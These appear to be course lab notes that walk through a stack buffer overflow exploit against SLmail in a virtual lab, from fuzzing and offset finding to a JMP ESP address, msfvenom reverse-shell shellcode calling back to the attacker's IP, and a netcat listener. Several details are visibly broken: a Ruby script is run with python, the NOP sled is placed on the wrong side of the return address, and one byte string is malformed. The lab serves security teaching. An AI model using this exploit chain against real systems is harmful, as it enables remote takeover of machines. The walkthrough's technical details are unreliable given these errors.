51 lines
3.9 KiB
Markdown
51 lines
3.9 KiB
Markdown
1. **Prepare Parrot OS and Windows 7 VM:**
|
||
- Start your UTM instance with both Parrot OS (NAT mode) and Windows 7 VMs active.
|
||
- Switch Parrot OS to "Host-only network" mode and note down its IP address.
|
||
- Ensure you can ping Windows 7 VM from Parrot OS.
|
||
2. **Download required files:**
|
||
- Download the "Scripts.zip" file from Blackboard (T2, Week 2) on your Parrot OS.
|
||
- Extract the contents of "Scripts.zip" to a convenient location, e.g., `/opt/exploit-dev/scripts/`.
|
||
3. **Run SLmail and Immunity Debugger (ID):**
|
||
- Start SLmail on Windows 7 VM.
|
||
- Run Immunity Debugger as an administrator. To make the font more legible, right-click on the black area > appearance > font > OEM.
|
||
4. **Attach SLmail to ID:**
|
||
- In Immunity Debugger, go to `File > Attach…`, select the SLmail process, and click 'Open'.
|
||
- Set the debugger to "Running" state by clicking on the "Running" button in the toolbar.
|
||
5. **Run the fuzzer:**
|
||
- Open a terminal on Parrot OS and navigate to the scripts directory.
|
||
- Run `python fuzzer.py <Windows 7 VM IP address> 49500` (SLmail's default port is 49500) to start fuzzing the application.
|
||
- The goal is to Crash SLmail by sending random data.
|
||
6. **Generate unique 4-byte patterns:**
|
||
- Run `ruby pattern_create.rb <length>` (e.g., `ruby pattern_create.rb 100`) to generate a unique 4-byte pattern that will help in identifying the crash location.
|
||
7. **Find the starting offset:**
|
||
- Send the generated pattern to SLmail using the fuzzer and observe where it crashes. The offset is the number of bytes before the crash location.
|
||
- Use `python pattern_offset.rb <crash_location>` to calculate and confirm the offset.
|
||
8. **Verify the offset:**
|
||
- Send a crafted payload with the correct EIP overwritten to ensure that our previous steps were accurate.
|
||
- Use `python sendshell.py <Windows 7 VM IP address> 49500 "<EIP>" "stupid string"` to send the crafted payload.
|
||
9. **Check for space in the stack:**
|
||
- Send approximately 800 bytes after the EIP location to verify there's enough space for our payload.
|
||
- Use `ruby space.rb <offset> 800` to check the available space.
|
||
10. **Find bad characters:**
|
||
- Identify byte values that cause the application to behave unexpectedly (e.g., crash or exhibit unexpected behavior).
|
||
- Use `ruby badchars.rb <Windows 7 VM IP address> 49500 <offset>` to find and list bad characters.
|
||
11. **Create shellcode:**
|
||
- Use msfvenom to create a payload (shellcode) with the appropriate architecture and privileges, excluding the bad characters identified earlier.
|
||
- Run `msfvenom -p windows/shell_reverse_tcp LHOST=<Parrot OS IP address> LPORT=443 -a x86 --bad-chars=<bad_characters> -f raw` to generate the shellcode.
|
||
12. **Identify DLL without memory protections:**
|
||
- Use `!mona modules` in Immunity Debugger to identify DLLs without memory protections.
|
||
- Our target is `slmfc.dll`.
|
||
13. **Find JMP ESP address:**
|
||
- Use nasm_shell to get opcodes for JMP ESP (FF E4).
|
||
- Run `nasm_shell> ff e4` to get the opcodes.
|
||
- Use `!mona find -s "\xff\xe4" -m slmfc.dll` to search for the FF E4 opcode in slmfc.dll and choose an address (e.g., `0x5f4a358f`) as the new EIP.
|
||
14. **Prepare exploit script:**
|
||
- Replace `Bs` in the exploit script (e.g., `exploit.rb`) with the address chosen earlier.
|
||
- Add a NOP sled (e.g., `\x90` *16*) before the JMP ESP address to account for any slight miscalculations or fluctuations in memory layout.
|
||
- The exploit script should look something like this: `"\x90" * 16 + "\xff\x\xe4" + "\xbe\xxx\xxxx\xxx\xxx"`. Replace `Bs` with the chosen address.
|
||
15. **Start netcat listener:**
|
||
- On Parrot OS, run `nc -lvp 443` to start a netcat listener on port 443.
|
||
16. **Run exploit:**
|
||
- Execute the prepared exploit script with `ruby exploit.rb <Windows 7 VM IP address> 49500`.
|
||
- Once the exploit triggers, you should get a shell on the Windows 7 VM.
|